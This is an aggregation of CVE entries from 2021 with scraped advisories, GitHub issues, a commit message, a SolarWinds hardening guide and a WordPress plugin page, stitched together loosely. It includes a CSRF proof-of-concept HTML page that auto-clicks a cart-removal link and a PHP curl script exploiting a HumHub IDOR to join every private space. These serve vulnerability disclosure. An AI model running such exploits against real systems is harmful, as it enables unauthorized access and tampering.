In ProjectWorlds Online Shopping System PHP 1.0, a CSRF vulnerability in cart_remove.php allows a remote attacker to remove any product in the customer's cart.

**Author**

KhanhCM (@khanhchauminh)

**Version: 1.0****Details**

The GET request for removing a product with `id=1` looks like this:

    http://127.0.0.1:8888/cart_remove.php?id=1
    

Changing the value of the `id` parameter in the customer session will remove the product with that ID.  
A remote attacker can embed the request into an innocent-looking hyperlink:

    <a href="http://127.0.0.1:8888/cart_remove.php?id=1">View</a>
    

**Step to reproduce**

1.  First, create a malicious HTML page then host a website containing that page.

**PoC:**

    <html>
    <head>
      <title>CSRF PoC</title>
    </head>
    <body>
      <p>CSRF PoC</p>
      <a id='link' href="http://127.0.0.1:8888/cart_remove.php?id=1">View</a>
      <script>
        document.getElementById('link').click();
      </script>
    </body>
    </html>
    

2.  Entice the customer to click on the link to the malicious site. When the customer browses to that site, the link would be automatically clicked via JavaScript and the product will be removed.

**Response in Burpsuite**

![image](https://user-images.githubusercontent.com/48460056/139583316-95aa1edd-bc77-46d4-82f2-d1073214406e.png)  
![image](https://user-images.githubusercontent.com/48460056/139583328-20c9f436-2ca6-4cde-be99-70aa415de33c.png)

**Source code review****cart\_remove.php**

![image](https://user-images.githubusercontent.com/48460056/139582921-f25f130c-625b-4e9e-b47f-606c0366d280.png)

**Remediation**

Implement an Anti-CSRF Token.

CVE-2021-43158: CSRF vulnerability in cart_remove.php allows a remote attacker to remove any product in the customer's cart · Issue #2 · projectworldsofficial/online-shopping-webvsite-in-php

HumHub is an open-source social network kit written in PHP. Prior to HumHub version 1.10.3 or 1.9.3, it could be possible for registered users to become unauthorized members of private Spaces. Versions 1.10.3 and 1.9.3 contain a patch for this issue.

**Description**

Hello guys, hope you are having an awesome day! 🤗

HumHub has a functionality for spaces where you define that only invited users will be able to join a space. Private spaces come with this option but you can also define it for public ones.

While a user is creating a space, this user is requested to invite people to the new space, and this specific inviting endpoint, which is

    https://example.com/space/create/invite?spaceId=ID_HERE
    

is vulnerable to an IDOR, which means that if you change the spaceId parameter to the ID of any other space, the invite will be sent to this different space, no matter if it's yours or not.

**Steps to Reproduce**

In order to reproduce it, I'm going to assume you are using Burp Suite, but any other proxy tool will work basically the same, or even the browsers' Dev Tools might suit our needs here.

1 => Having an instance of HumHub up and running, create one account (UserA) and then create some private spaces;

2 => Logout from the first account and create a second one (UserB). Going to the spaces page, you are going to see none of the previously created private spaces;

3 => Follow the normal steps of creating a new space, until you get to the step which asks you to invite people. Select a user but don't send anything yet;

4 => If you are using a proxy tool, turn on the mode which pauses/intercepts requests. If you are going to use just the browser, open the network tab of Dev Tools;

5 => Going back to the space creation steps, click on "done" and then look (in your proxy tool or dev tools) for a request pointing to /space/create/invite?spaceId=something

6 => From this request, you are going to need the data which is listed below. Store it elsewhere for a few moments.

    1. The spaceId presented on the URL. // e.g.: 5
    2. The X-CSRF-Token header // e.g.: X-CSRF-Token: RMO2UxPutPpAHzJ8G61RekAm6kisMFMoFyS8WYJxYOkbqdpqcbuFsBlXahN8niIXFxSiKchyG2VyU9RozgAGmw==
    3. Your cookies // e.g.: Cookie: PHPSESSID=gum62u217vegimktf07jmodtdh; _identity=c8f37b6923cfa5b5300e342549200705bf64e25dfb10c0a279fdf1c60ffa7d53a%3A2%3A%7Bi%3A0%3Bs%3A9%3A%22_identity%22%3Bi%3A1%3Bs%3A50%3A%22%5B4%2C%22fff5af-ff1a6f8f71f-sagsag51-fafsadff%22%2C2592000%5D%22%3B%7D; _csrf=7101b890dc816f2f27f40ef0cc5fccbcde83f09cabbf268052813684b289c452a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22_jl9bU1JYHXog3smW2HadBHMewh1Lqfr%22%3B%7D
    4. The request body //e.g.: _csrf=5DglQFCF-RYl3c2fUNGeG2Jk83ihD8qw8VJ1YO0SRmK7Ukl5MtDIXHyVlfA34u12NVa7GcVNgv2UJR1RoWMgEA%3D%3D&InviteForm%5Binvite%5D=&InviteForm%5Binvite%5D%5B%5D=04d7b10a-8a53-47fc-8cc2-70c0bc5a464f&InviteForm%5BinviteExternal%5D=
    

7 => Forward the requests if you are on a proxy tool. Now, from the request body, you will need to change the parameter InviteForm%5Binvite%5D%5B%5D (or InviteForm[invite][] if it's not url-encoded), from the originally invited user's guid to your own UserB guid. This can be found by opening a new tab and making a GET request to https://example.com/user/search/json?keyword=UserB_DISPLAY_NAME_HERE;

8 => Now create and run a .php file with the following PoC (don't forget to change the initial variables with the data you collected):

    <?php
    
    $spaceId = YOUR_SPACE_ID_NUMBER;
    $baseURL = "https://YOUR_HOST/";
    $requestBody = "YOUR_REQUEST_BODY";
    $x_csrf_token = "X-CSRF-Token: YOUR_SUPER_COOL_TOKEN_HERE";
    $cookies = "Cookie: YOUR_COOKIES";
    
    $ch = curl_init();
    
    // It goes from the last to the first space, in a way that the user get invited to
    // all the private spaces
    for( $i = $spaceId; $i >= 1; $i-- ) {
        curl_setopt($ch, CURLOPT_URL, $baseURL.'/space/create/invite?spaceId='.$i);
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch,CURLOPT_POSTFIELDS, $requestBody);
        curl_setopt($ch,CURLOPT_HTTPHEADER,array(
            'X-Requested-With:XMLHttpRequest',
            $x_csrf_token,
            $cookies
        ));
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, TRUE);
        curl_setopt($ch, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.52 Safari/537.17');
        curl_setopt($ch, CURLOPT_AUTOREFERER, true); 
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    
        $content = curl_exec($ch);
        
        if(curl_getinfo($ch,CURLINFO_HTTP_CODE) === 200) {
            echo "Invite received for ID = " . $i . " (if you are not already in)\n";
        }
    }
    
    ?>
    

9 => Once it's done, go back to the spaces page as UserB, and see that they got invited to every single private group that UserA created.

**Impact**

This issue compromises the confidentiality of private spaces, once any authenticated user can have access to all of them without the permission of the spaces' owners.

CVE-2021-43847: Authorization Bypass Through User-Controlled Key in humhub

`solidus_frontend` is the cart and storefront for the Solidus e-commerce project. Versions of `solidus_frontend` prior to 3.1.5, 3.0.5, and 2.11.14 contain a cross-site request forgery (CSRF) vulnerability that allows a malicious site to add an item to the user's cart without their knowledge. Versions 3.1.5, 3.0.5, and 2.11.14 contain a patch for this issue. The patch adds CSRF token verification to the "Add to cart" action. Adding forgery protection to a form that missed it can have some side effects. Other CSRF protection strategies as well as a workaround involving modifcation to config/application.rb` are available. More details on these mitigations are available in the GitHub Security Advisory.

Permalink

Browse files

Protect `Spree::OrdersController#populate` against CSRF attacks

See
GHSA-h3fg-h5v3-vf8m
for all the details.

Some time ago, all order actions were left out of CSRF protection (see
95ea570). The reason given was that the
authentication token got stale after the second rendering because the
product page is cached. That was limited to \`#populate\` in
cb79754 (see also
spree/spree#5601).

However, those assumptions are not correct. Although the authenticity
token changes at every request, that doesn't mean that the old ones are
no longer valid. The variation comes from a one-time pad added to a
session-dependant token (and meant to avoid timing attacks). However,
before validation, that one-time pad is removed. That means the token
remains valid as long as the session has not been reset. Think about
submitting a form from one browser tab after opening another with the
same URL. Even if both tokens differ, the submission from the first tab
will still be valid. You can read
https://medium.com/rubyinside/a-deep-dive-into-csrf-protection-in-rails-19fa0a42c0ef
for an in-deep understanding.

The initial confusion could come because of
rails/rails#21948. Due to browser-side cache,
a form can be re-rendered and sent without any attached request cookie.
That will cause an authentication error, as the sent token won't match
with the one in the session (none in this case). There's no perfect
solution for that, and all partial fixes should be seen at the
application level. From our side, we must provide a safe default. For an
excellent survey of all the available options, take a look at
https://github.com/betagouv/demarches-simplifiees.fr/blob/5b4f7f9ae9eaf0ac94008b62f7047e4714626cf9/doc/adr-csrf-forgery.md.
The information given in that link is third-party but it's very
relevant here. For that reason we've copied it in the security advisory
(see link above), but all the credit goes to @kemenaran.

*   Loading branch information

Showing with **0 additions** and **1 deletion**.

1.  +0 −1 frontend/app/controllers/spree/orders\_controller.rb

CVE-2021-43846: Protect `Spree::OrdersController#populate` against CSRF attacks · solidusio/solidus@4d17cac

The "Log alert to a file" action within action management enables any Orion Platform user with Orion alert management rights to write to any file. An attacker with Orion alert management rights could use this vulnerability to perform an unrestricted file upload causing a remote code execution.

This document describes configuration options for securing your Orion Platform deployment.

**Best practices**

*   Ensure you have installed the latest versions of the SolarWinds® Orion® Platform, including hotfixes and service releases.
    
    If you are not on the latest version of the Orion Platform, you can temporarily protect your environment against the Supernova malware by applying the following security fix: https://downloads.solarwinds.com/solarwinds/Support/SupernovaMitigation.zip
    
*   Maintain the latest host operating system, application, and network security updates.
    
*   Maintain your SQL Server by applying the latest cumulative updates and service packs.
    
*   Keep your Orion Platform and your SQL database on separate servers.
    
    SolarWinds recommends that you use a dedicated SQL instance for your Orion database to improve security by segregating the Orion database from other production databases.
    
*   Be careful not to expose your Orion Platform website on the public Internet.
    
    If you must enable outbound Internet access from SolarWinds Servers, create a strict allow list and block all other traffic. See Orion Platform Product Features Affected by Internet Access.
    
*   Disable unnecessary ports, protocols, and services on your host operating system and on applications, like SQL Server. For more details, see the SolarWinds Port Requirements guide and Best practices for configuring Windows Defender Firewall (© 2021 Microsoft, available at https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-firewall/best-practices-configuring, obtained on January 13, 2021.)
    
*   Apply proper segmentation controls on the network where you have deployed the SolarWinds Orion Platform and SQL Server instances.
    
*   Implement strict access control and auditing in your environment at operating system and network layers. Limit access to the Orion and SQL server instances to only those authorized persons who require access as part of their duties.
    
*   Apply layered network security controls, like leveraging application load balancers, setting appropriate firewall rules to limit who can access or send network traffic to your Orion Platform, and deploying security tools to provide additional monitoring across your Orion Platform and SQL Server instances.
    
*   Purchase additional web servers for segregation and accessing the web console. Unlike your primary polling engine, these do not run many critical services. Once setup, you can disable IIS and web services on your primary polling engine and allow the rest of the services to function independently of IIS.
    
*   If you deploy multiple Orion servers in your environment, dedicate these servers where possible and minimize the installation of any third-party software.
    
*   Do not create local Orion-based accounts. We recommend at minimum utilizing Windows Authentication, or implementing a SAML v2 based solution, if you cannot integrate Windows or SAML-based authentication.
    
*   Ensure you configure account settings and leverage both account and view limitations, along with module-specific roles only for the tasks they require in their role.
    
*   Follow Microsoft's guidelines for securing SQL Server instances. See Securing SQL Server (© 2021 Microsoft, available at https://docs.microsoft.com/, obtained on January 6, 2021.).
    
*   Before you install the Orion Platform, ensure the servers in your environment are compliant with supported security standards:
    
    *   STIG
    *   FIPS
    *   Device Guard
*   Separate your Orion Platform servers from your infrastructure on managed VLANs/Jumpboxes.
    
*   On servers, leverage SolarWinds agents to ensure secure, encrypted polling over a single port. See Poll devices with SolarWinds Orion agents.
    
*   On network devices, use SNMP v3. See CISA Alert (TA17-156A) Reducing the risk of SNMP Abuse (© 2021 U.S. Department of Homeland Security, available at https://us-cert.cisa.gov/ncas/alerts/TA17-156A, obtained on January 11, 2021.)
    
*   Ensure you have dedicated security monitoring tools in place. Configure AV, EDR, SIEM, Proxy, IDS, or IPS while leveraging SolarWinds products, such as ARM, NCM, Patch Manager, SCM, SEM, or UDT, to provide additional monitoring across your Orion Platform environment and ensure compliance. Carefully monitor logs, user accounts, rogue devices, configuration changes, and security patches across all of your network devices and servers.
    
*   Rotate credentials (service accounts, SNMP, SSH, and so on) where local policies may not enforce this due to unexpected outages of monitoring. See Manage Orion Service Accounts.
    
*   Assign the Debug Programs user right only to the Administrators group.
    

To learn about using built-in security features native to IIS to add an extra layer of security to your deployment with built-in security features native to IIS, see this Success Center article about the IP Address and Domain Restrictions Role Service.

**Secure configuration options**

  

Security option

Version

Default settings

HTTPS

2017.1 and later

Enabled by default if a suitable certificate is found. » Show me how

Recommendations:

*   2048 bits for RSA (~112bit security) or 256+ bits for ECDSA (128bit security).
*   Over 2048bits, use ECDSA.
*   Renew certificates regularly.
*   Sign certificates with SHA 256 or higher.

FIPS

All versions

Disabled by default

See Enable FIPS for Orion Platform products.

SQL Encrypted SSL

2017 and later

Disabled by default. To configure the Orion Platform and SQL with an SSL connection, see Encrypt database connections with SSL

HSTS

2018.4 and later

Disabled by default  
» Show me how to enable this

CSRF

2018.4 and later

_\_AntiXSRFToken_ enabled by default

_XSRF-TOKEN_ enabled by default

» Show me how to enable this

Secure Cookies

2018.4 and later

Enabled by default » Show me how

Session Management

2020.2 and later

Enabled by default » Show me how

TLS & Cipher Suites

2019.4 and later

Settings required » Show me how

TLS Certificate validation

2019.2 and later

Disabled by default » Show me how to enable

SAML signing

2018.4 and later

Disabled by default » Show me how to enable this

Sensitive Exception Details

2019.2 and later

Disabled by default » Show me how to disable this

Server Information Headers (Banner)

2020.2 and later

» Show me how to set this

IIS Request Filtering

2020.2 and later

See the kb on IIS handler mapping requirements to find out what extensions to allow to use request filtering in IIS.

Session Timeouts

All versions

» Show me how to set this

Secure external programs and script alerting actions

2020.2.1 HF2

Starting with the Orion Platform 2020.2.1 Hotfix 2, you can configure your Orion Platform alert actions to be run in the context of a limited user account. See the article on securing external programs and script actions.

Secure SQL variables used in Orion Platform

2020.2.1 HF2

Starting with the Orion Platform 2020.2.1 Hotfix 2, you can use the MacroParserisSecuringSQLMacroEnabled setting to improve the overall security of your Orion Platform by restricting specific SQL macros. See the article on securing SQL variables.

Browser Auto-Complete

2020.2.6 and later

» Show me how to set this

Brute force protection (account lockout)

2020.2.6 and later

Orion individual accounts (or SQL-based accounts) are automatically locked. By default, accounts are locked after 10 failed login attempts for 15 minutes. See Unlock user accounts for details.

**HTTPS**

Supported by: Orion Platform 2017.1 and later

HTTPS is configured on fresh installs only when a suitable certificate is found on the system. SolarWinds recommends that you do not use a self-signed certificate.

**Recommendations for Certificates**

*   SolarWinds recommends using strong private keys: 2,048 bits for RSA (~112 bits of security) or 256+ bits for ECDSA (128 bits fo security).
*   RSA doesn't scale well above 2,048 so after that ECDSA should be preferred.
*   Renew certificates (including private keys) regularly because revocation mechanisms are not reliable.
*   Sign your certificates with SHA256 or higher.

**How to enable**

1.  Run the Configuration wizard, click Next to use defaults until you reach the Website Settings step.
    
2.  Select the Enable HTTPS option. See Configure the Orion Web Console to use HTTPS for details.
    

**HSTS**

Supported by: Orion Platform 2018.4 and later

HTTPS Strict Transport Security (HSTS) protects your deployment against protocol downgrade attacks (MITM SSL strip). HSTS headers instruct a client's browser to communicate only on HTTPS for a specified period of time. Orion uses 1 year as a default.

**How to enable**

1.  In the Orion Web Console, click Settings > All Settings, and then click Web Console Settings in the Product Specific Settings (/Orion/Admin/Settings.aspx).
    
2.  Select the STRICT TRANSPORT SECURITY (HSTS) option and submit your changes.
    

**CSRF Protection**

Supported by:

*   Orion Platform 2018.4 -2019.4 (not by default)
*   Orion Platform 2020.2 and later (supported by default)

Cross-Site Request Forgery (CSRF) is an attack where the user performs unwanted action while being authorized. Orion uses two separate CSRF tokens/cookies.

*   \_\_AntiXSRFToken - Used by ASP.NET for postback validation, validation enabled by default
*   XSRF-TOKEN - Used by .asmx and WebAPI, validation enabled by default

**How to enable**

1.  Log in to the Orion Web Console as an administrator and go to Advanced Configuration. Adjust the Orion Web Console URL as follows: \[hostname\]/Orion/Admin/advancedconfiguration/global.aspx
    
2.  Select the EnableXsrfProtection option and save your changes.
    

**Secure Cookies**

Supported by: Orion Platform 2018.4 and later

Secure flag helps to protect cookies from MITM attacks. This is enabled by default.

**How to enable**

1.  Log in to the Orion Web Console as an administrator and go to Advanced Configuration. Adjust the Orion Web Console URL as follows: \[hostname\]/Orion/Admin/advancedconfiguration/global.aspx
    
2.  Select the EnableCookieSecureFlag option and save your changes.
    

**Session Management**

Supported by: Orion Platform 2020.2 and later (enabled by default)

To prevent session fixation attacks and provide persistent logout. Session management binds the session ID with its owner and validates it on each request. It manages the session lifecycle from login, logout, and expiration.

**How to enable**

1.  Log in to the Orion Web Console as an administrator and go to Advanced Configuration. Adjust the Orion Web Console URL as follows: \[hostname\]/Orion/Admin/advancedconfiguration/global.aspx
2.  Select the EnableSessionCoupling option and save your changes.

**TLS & Cipher Suites**

Supported by: Orion Platform 2019.4 and later

See TLS Compatibility with Orion Platform products for details.

**How to enable**

SolarWinds recommends that you enable TLS machine-wide. You can use IISCrypto or alter Windows registry keys on your own:

*   IIS Crypto (© 2020 Nartac Software, obtained from https://www.nartac.com/Products/IISCrypto on October 1, 2020).
*   Restrict the use of certain cryptographic algorithms and protocols in Schannel.dll (© 2020 Microsoft, obtained from https://support.microsoft.com/en-us/help/245030/how-to-restrict-the-use-of-certain-cryptographic-algorithms-and-protoc on October 1, 2020).

It is also possible to configure protocols for Orion services only.

**RabbitMQ**

You can configure all cipher suites that RabbitMQ accepts (and which TLS version) in \\ProgramData\\SolarWinds\\Orion\\RabbitMQ\\rabbitmq.config configuration file.

Go to the _ssl\_options_ section and find the following subsections:

*   _\_ciphers_: You can set cipher suites that RabbitMQ accepts, these should correspond with your system-wide settings (set by IIS Crypto).
*   _\_versions_: You can specify TLS versions here.

See TLS Support for details (© 2007-2020 VMware Inc. or its affiliates, obtained from https://www.rabbitmq.com/ssl.html#tls-versions on October 1, 2020).

SolarWinds uses the classic config format of the config file (there is section on how the setting of cipher suites must look like).

**Recommended Crypto setting**

Global machine setting: NON DEFAULT

Server/Client Protocol: TLS 1.2

Ciphers: AES 128 / 128, AES 256/256

Hashes: SHA1, SHA256, SHA384, SHA512

Key exchanges: Diffie-Hellman, PKCS, ECDH (DHE Miminum key length 2048 bit)

RabbitMQ Config: DEFAULT

RabbitMQ config has two default cipher suites settings which are configured by FIPS Manager:

*   FIPS Mode On Ciphers
    
    {dhe\_rsa,aes\_256\_gcm,aead,sha384}
    
    {dhe\_dss,aes\_256\_gcm,aead,sha384}
    
    {dhe\_rsa,aes\_256\_cbc,sha256}
    
    {dhe\_dss,aes\_256\_cbc,sha256}
    
    {dhe\_rsa,aes\_128\_gcm,aead,sha256}
    
    {dhe\_dss,aes\_128\_gcm,aead,sha256}
    
    {dhe\_rsa,aes\_128\_cbc,sha256}
    
    {dhe\_dss,aes\_128\_cbc,sha256}
    
*   FIPS Mode Off Ciphers
    
    {ecdhe\_rsa, aes\_256\_gcm, aead, sha384}
    
    {ecdhe\_ecdsa, aes\_256\_gcm, aead, sha384}
    
    {ecdhe\_rsa, aes\_256\_cbc, sha384, sha384}
    
    {ecdhe\_ecdsa, aes\_256\_cbc, sha384, sha384}
    
    {ecdhe\_rsa, aes\_128\_gcm, aead, sha256}
    
    {ecdhe\_ecdsa, aes\_128\_gcm, aead, sha256}
    
    {ecdhe\_rsa, aes\_128\_cbc, sha256, sha256}
    
    {ecdhe\_ecdsa, aes\_128\_cbc, sha256, sha256}
    
    {ecdh\_rsa, aes\_256\_gcm, aead, sha384}
    
    {ecdh\_ecdsa, aes\_256\_gcm, aead, sha384}
    
    {ecdh\_rsa, aes\_256\_cbc, sha384, sha384}
    
    {ecdh\_ecdsa, aes\_256\_cbc, sha384, sha384}
    
    {ecdh\_rsa, aes\_128\_gcm, aead, sha256}
    
    {ecdh\_ecdsa, aes\_128\_gcm, aead, sha256}
    
    {ecdh\_rsa, aes\_128\_cbc, sha256, sha256}
    
    {ecdh\_ecdsa, aes\_128\_cbc, sha256, sha256}
    
    {dhe\_rsa, aes\_256\_gcm, aead, sha384}
    
    {dhe\_dss, aes\_256\_gcm, aead, sha384}
    
    {dhe\_rsa, aes\_256\_cbc, sha256}
    
    {dhe\_dss, aes\_256\_cbc, sha256}
    
    {dhe\_rsa, aes\_128\_gcm, aead, sha256}
    
    {dhe\_dss, aes\_128\_gcm, aead, sha256}
    
    {dhe\_rsa, aes\_128\_cbc, sha256}
    
    {dhe\_dss, aes\_128\_cbc, sha256}
    

**TLS Certificate Validation**

Supported by: Orion Platform 2019.2 and later

As required by CC PP, TLS certificates should be fully validated.

**How to enable**

1.  Log in to the Orion Web Console as an administrator and go to Advanced Configuration. Adjust the Orion Web Console URL as follows: \[hostname\]/Orion/Admin/advancedconfiguration/global.aspx)
    
2.  Select the following options and save your changes:
    
    *   CheckOnCertificateChainErrors
    *   CheckOnCertificateNameMismatch
    *   CheckOnCertificateRevocation

**SAML Signing**

Supported by: Orion Platform 2018.4 and later (not by default)

Applicable when Single sign-on is used. By default, only one signature is required and validated (assertion or SAML response).

You can configure the Orion Platform to require a specific validation or both validations.

See Authenticate Orion Platform users with SAML v2 for configuration details.

**How to enable**

1.  Log in to the Orion Web Console as an administrator and go to Advanced Configuration. Adjust the Orion Web Console URL as follows: \[hostname\]/Orion/Admin/advancedconfiguration/global.aspx)
    
2.  Select the following options and save your changes:
    
    *   SamlAssertionSigningRequired
    *   SamlResponseSigningRequired
        

**Sensitive Exception Details**

Supported by: Orion Platform 2019.2 and later (disabled by default)

By default, only users with Administrator rights can see detailed exceptions. This setting protects you from disclosing sensitive information (variable names, SQL strings, system path information, and source/program code or call stacks) to Orion users.

**How to disable**

1.  Log in to the Orion Web Console as an administrator and go to Advanced Configuration. Adjust the Orion Web Console URL as follows: \[hostname\]/Orion/Admin/advancedconfiguration/global.aspx
    
2.  Clear the IncludeErrorDetail option and save your changes.
    

**Server Information Headers (Banner)**

Supported by: Orion Platform 2020.2 or later

Not to disclose server information in headers (Server - Specifies the webserver version. X-Powered-By - Indicates that the website is "powered by ASP.NET." X-AspNet-Version - Specifies the version of ASP.NET used), apply additional configuration on IIS.

**How to configure**

See Disable the IIS web banner and other IIS headers in the Orion Platform for details.

**Session Timeouts**

You can configure your Orion Platform sessions to time out after a shorter time than the default 25 minutes.

1.  Log in to the Orion Web Console as an administrator and click Settings > All Settings in the menu bar.
    
2.  In the Product Specific Settings grouping, click Web Console Settings.
    
3.  In Session Timeout, type a shorter time period than the default, and save your changes. The default is 25 minutes.
    

**Browser Auto-Complete**

Supported by 2020.2.6 and later

Browser auto-complete can store sensitive data and can be disabled by setting correct attribute to input html element. Browser auto-complete is now disabled on Login page and some admin pages.

**How to enable/disable**

1.  Connect to Orion database and update the WebSettings table.
    
2.  SET 'UseBrowserAutoComplete' to 'True'/'False'.

CVE-2021-35244: Secure Configuration for the Orion Platform

Cross-Site Request Forgery (CSRF) vulnerability leading to Cross-Site Scripting (XSS) discovered in tarteaucitron.js – Cookies legislation & GDPR WordPress plugin (versions <= 1.5.4), vulnerable parameters "tarteaucitronEmail" and "tarteaucitronPass".

![](https://ps.w.org/tarteaucitronjs/assets/icon-256x256.png?rev=2510915)

*   Details
*   Reviews
*   Installation
*   Support
*   Development

**Description**

tarteaucitron.js is the most used script to get in compliance with cookies and GDPR.

Analytics, AdSense, Twitter … +100 more  
They have never been so easy to install!

Open an account now: https://tarteaucitron.io/

Free for 3 services or unlimited for 15€HT/month

**Installation****WordPress Admin Method**

1.  Go to you administration area in WordPress `Plugins > Add`
2.  Look for `tarteaucitron.js` (use search form)
3.  Click on Install and activate the plugin
4.  Find the settings page through `Settings > tarteaucitron.js`

**FTP Method**

1.  Upload the complete `tarteaucitronjs` folder to the `/wp-content/plugins/` directory
2.  Activate the plugin through the ‘Plugins’ menu in WordPress
3.  Find the settings page through `Settings > tarteaucitron.js`

**Reviews**

![](https://secure.gravatar.com/avatar/a34f6a804092631437797f39609d27ab?s=60&d=retro&r=g)

Un plugin simple d'installation et personnalisable facilement. J'avoue bien aimé ce petit picto citronné en comparaison aux tartines bien moches qu'on peut trouver ailleurs. Un dév sympa qui n'a pas le melon 😉 Vive le citron !

![](https://secure.gravatar.com/avatar/8a52927da549030f3961c932a90e0a82?s=60&d=retro&r=g)

Après des tests un peu poussés, le top pour ceux qui acceptent de faire un tout petit effort d'intégration en version gratuite... Ou pas, avec la version payante. Indiscutablement, si Amauri est un développeur de talent qui semble avoir négocié avec la CNIL avant tous les autres, il ne met pas assez en avant son outil qui, même dans sa version gratuite (!!), s'installe plutôt facilement pour le commun des développeurs pas trop fainéants, et regorge de fonctionnalités, comme la possibilité d'alimenter son code en services pré-définis (pour les principaux) et cerise sur le gâteau, la description de ces services via un lien vers les éditeurs concernés, et tout ça, automatiquement !! Et on continue avec la traduction de l'interface en fonction de la localisation des navigateurs, etc. Déjà à ce stade, la concurrence est à genoux ! Une approche plutôt altruiste de la part du développeur (qui mérite mille fois d'être rémunéré avec sa version pro pour ceux qui préfèrent un service tout prêt et sans effort), qui n'est pas mise suffisamment en avant et ne mérite pas son score trop modeste sur cette plateforme. Et je ne parle pas (mais si, j'en parle 😉 des critiques négatives de la part de pseudo-développeurs trop habitués à ce qu'on leur serve la soupe toute chaude et sans frais. On s'imagine aussi que les solutions qui trustent le max d'étoiles, telles que Cookieyes, Borlabs et consorts, représentent les solutions absolues mais sont devenues, à ce jour, obligatoirement payantes pour satisfaire les besoins de la CNIL, et demanderont un travail de traduction particulièrement fastidieux. Et surtout, l'argument ultime du scan auto des cookies, plus que perfectible et obscur dans la majorité des cas, imposera l'obligation d'aller à la pêche aux cookies via Chrome > Application... (ou Firefox), et bonne chance pour identifier clairement les cookies et les intégrer. Conclusion (pour ceux qui ont eu la patience d'arriver jusque là 😉 : je dis un grand merci à ce développeur, qui ne fait pas le forcing avec sa version payante, et qui nous aide bien volontier à optimiser la solution libre. Perso, ça vaut de l'or ! A un moment, dans ce monde de pseudo gratuité, il faut promouvoir une solution que l'on nous sert quasiment sur un plateau, et qui limite le grand cauchemar des développeur dont la CNIL ne se préoccupe pas une seconde une fois qu'elle a fixé ses règles. Forza tarteaucitron !!!!!! PS : je n'ai aucune commission de la part de l'éditeur, je suis juste un développeur standard qui ai pris le temps d'évaluer cet outil en toute objectivité.

![](https://secure.gravatar.com/avatar/1f2951d8680a79c7c80459bbad5752b3?s=60&d=retro&r=g)

Very good solution for dealing with GDPR

![](https://secure.gravatar.com/avatar/32c6a2cb60e0b9c799a9511db2dcb698?s=60&d=retro&r=g)

Je n'ai pas forcément des connaissances très poussées en code mais j'ai trouvé ce plugin assez facile d'utilisation et complet. En zieutant le web, on trouve pas mal de ressources et d'explications associées. Une bonne découverte =) !

![](https://secure.gravatar.com/avatar/87907a96f5fe65cebfbe9932215d1919?s=60&d=retro&r=g)

Contrairement aux messages négatifs que j'ai pu lire, le script fonctionne très bien en version gratuite, est très léger, et il est simplissime à mettre en œuvre sur une installe WP. Avec un chouya de CSS, le bandeau s'intègre de plus parfaitement dans le design du site. Seul souci en date du 28/10/2018, c'est son manque de compatibilité avec certains plugins de cache et d'optimisation de code... Et par exemple même en essayant de l'exclure d'Autoptimize, il y a une erreur due à l'appel d'un sous-script à cause d'un chemin mal généré (il récupère le chemin du script principal qui est évidemment faussé par Autoptimize). Mais une ligne de code à ajouter au début du fichier suffit à tout remettre en ordre : var tarteaucitronForceCDN = window.location.protocol + '//' + window.location.host + '/tarteaucitron/'; Espérons que le script sera vite corrigé 😉

![](https://secure.gravatar.com/avatar/c17d4b32ecdf8f2f9e77e5d888bac97b?s=60&d=retro&r=g)

a joke. It speaks of respect for privacy and it requires to create an account on a remote site to be able to function ... The RGPD generates worse things than before.

Read all 9 reviews

**Contributors & Developers**

“tarteaucitron.js – Cookies legislation & GDPR” is open source software. The following people have contributed to this plugin.

Contributors

*   ![](https://secure.gravatar.com/avatar/a1da541de5fd6f52955d4c4be09183b6?s=32&d=mm&r=g) AmauriC

**Changelog****1.6.1**

*   \[Security fix\] Multiple Authenticated (Admin+) Persistent XSS (Thanks Ex.Mi from https://patchstack.com/)

**1.6**

*   \[Security fix\] CSRF in back-end + Stored XSS in front-end (Thanks Julio Potier from https://secupress.me/)
*   Code improvement

**1.5.4**

*   Add ee locale

**1.5.3**

*   Fix a CSS conflict

**1.5.2**

*   Remove jQuery

**1.5.1**

*   Do not load the script if this is an admin area

**1.5.0**

*   Fix undefined $domain

**1.4.9**

*   Put the script on top of the page

**1.4.8**

*   Do not load tac on admin pages

**1.4.7**

*   Add more locales

**1.4.6**

*   Revert the oembed feature

**1.4.5**

*   Refresh the oembed cache

**1.4.4**

*   New way to set the video size

**1.4.3**

*   Rename clear class

**1.4.2**

*   Enable locales: se,vi

**1.4.1**

*   Enable all locales: bg,cn,cs,da,de,el,en,es,fi,fr,hu,it,ja,nl,pl,pt,ro,ru,sk,tr

**1.4**

*   New domain: tarteaucitron.io

**1.3.4**

*   Do not auto disconnect

**1.3.3**

*   Force the current locale

**1.3.2**

*   Force the locale of the website for the banner

**1.3.1**

*   Automatically convert youtube, vimeo and dailymotion video to the tarteaucitron version

**1.3**

*   New authentification method

**1.2.1**

*   Attempt to fix some login difficulty

**1.1**

*   Rework and update the plugin

**1.0**

*   Initial commit

CVE-2021-36887: tarteaucitron.js – Cookies legislation & GDPR

livehelperchat is vulnerable to Cross-Site Request Forgery (CSRF)

CVE-2021-4131

snipe-it is vulnerable to Cross-Site Request Forgery (CSRF)

CVE-2021-4130

In the TransformXML processor of Apache NiFi before 1.15.1 an authenticated user could configure an XSLT file which, if it included malicious external entity calls, may reveal sensitive information.

CVE-2021-44145: Apache NiFi Security Reports

Cross Site Request Forgery (CSRF) vulnerability in Change-password.php in phpgurukul user management system in php using stored procedure V1.0, allows attackers to change the password to an arbitrary account.

**Project Name**

User Management System in PHP Stored Procedure

**Language Used**

PHP5.6, PHP7.x

**Database**

MySQL 5.x

**User Interface Design**

HTML, AJAX,JQUERY,JAVASCRIPT

**Web Browser**

Mozilla, Google Chrome, IE8, OPERA

**Software**

XAMPP / Wamp / Mamp/ Lamp (anyone)

Last Updated

02 July 2021

This project is developed in PHP using Stored Procedure.

A stored procedure is a set of SQL commands that have been compiled and stored on the database server.  
